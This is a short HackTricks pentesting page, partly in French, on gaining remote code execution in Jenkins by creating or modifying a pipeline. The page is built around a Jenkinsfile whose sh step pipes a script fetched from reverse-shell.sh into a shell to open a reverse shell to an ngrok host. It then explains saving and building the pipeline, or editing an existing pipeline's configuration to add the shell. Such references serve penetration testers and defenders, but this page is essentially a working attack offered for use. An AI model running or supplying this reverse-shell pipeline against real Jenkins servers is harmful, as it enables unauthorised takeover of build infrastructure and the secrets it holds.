Jenkins RCE Creating/Modifying Pipeline

Support HackTricks

Creating a new Pipeline

Dans "Nouvel élément" (accessible dans /view/all/newJob), sélectionnez Pipeline :

Dans la section Pipeline, écrivez le reverse shell :

pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

Enfin, cliquez sur Save, puis sur Build Now et le pipeline sera exécuté :

Modifier un Pipeline

Si vous pouvez accéder au fichier de configuration d'un pipeline configuré, vous pourriez simplement le modifier en ajoutant votre reverse shell puis l'exécuter ou attendre qu'il soit exécuté.

Support HackTricks

Last updated